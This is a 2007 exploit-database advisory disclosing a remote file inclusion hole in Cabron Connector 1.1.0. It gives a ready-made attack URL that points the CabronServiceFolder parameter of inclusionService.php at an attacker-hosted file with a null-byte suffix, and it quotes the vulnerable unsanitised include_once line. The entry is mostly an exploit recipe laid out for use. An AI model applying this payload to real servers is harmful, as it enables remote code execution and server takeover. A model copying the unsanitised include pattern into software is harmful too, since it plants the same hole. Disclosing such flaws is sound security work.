Cabron Connector 1.1.0-Full Remote File Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Cabron Connector 1.1.0-Full Remote File Inclusion Vulnerability
# Published : 2007-04-17
# Author : Dj7xpl
# Previous Title : WitShare 0.9 (index.php menu) Local File Inclusion Vulnerability
# Next Title : ShoutPro <= 1.5.2 (shout.php) Remote Code Injection Exploit

-=-=-=-=-=-=-=-=-=-=-=-=-=I=R=A=N=-=-=-=-=-=-=-=-=-=-=-=-=-=-
                   Cabron Connector v1.1.0 
-=-=-=-=-=-=-=-=-=-=-=-=-=I=R=A=N=-=-=-=-=-=-=-=-=-=-=-=-=-=-

* Author :   Dj7xpl / Dj7xpl[at]Yahoo[dot]com
* Type :     Remote File Inclusion Vuln
* Download:  http://cabron.sourceforge.net
* Vuln:      http://[Target]/[Path]/services/samples/inclusionService.php?CabronServiceFolder=[EvilTxt]%00

-=-=-=-=-=-=-=-=-=-=-=-=-=I=R=A=N=-=-=-=-=-=-=-=-=-=-=-=-=-=-

-=-=-=-=-=-=-=-=-=-=-=-=-=I=R=A=N=-=-=-=-=-=-=-=-=-=-=-=-=-=-

* Vuln Code: 
             include_once("$CabronServiceFolder/lib/includedFunction.php");   <== Line(1)

-=-=-=-=-=-=-=-=-=-=-=-=-=I=R=A=N=-=-=-=-=-=-=-=-=-=-=-=-=-=-

# www.Syue.com [2007-04-17]